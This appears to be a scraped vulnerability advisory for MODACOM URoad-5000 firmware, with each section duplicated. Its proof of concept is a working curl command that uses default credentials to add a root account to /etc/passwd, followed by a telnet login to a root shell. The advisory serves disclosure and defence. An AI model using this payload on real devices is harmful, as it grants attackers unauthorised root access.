MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
BID:48089
Info
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
| Bugtraq ID: | 48089 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jun 02 2011 12:00AM |
| Updated: | Jun 02 2011 12:00AM |
| Credit: | Alex Stanev |
| Vulnerable: |
MODACOM URoad-5000 1450 |
| Not Vulnerable: | |
Discussion
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
MODACOM URoad-5000 is prone to a security-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to bypass certain security restrictions and execute arbitrary commands on the affected device.
MODACOM URoad-5000 firmware version 1450 is vulnerable; other versions may also be affected.
MODACOM URoad-5000 is prone to a security-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to bypass certain security restrictions and execute arbitrary commands on the affected device.
MODACOM URoad-5000 firmware version 1450 is vulnerable; other versions may also be affected.
Exploit / POC
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
Attackers may exploit these issues by using readily available network utilities.
The following proof of concept is available:
$curl --basic -u "engineer:engineer" -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet www.example.com
Trying www.example.com.
Connected to www.example.com
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands
Attackers may exploit these issues by using readily available network utilities.
The following proof of concept is available:
$curl --basic -u "engineer:engineer" -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet www.example.com
Trying www.example.com.
Connected to www.example.com
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands
Solution / Fix
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability
References:
References:
- MODACOM URoad-500 Homepage (MODACOM)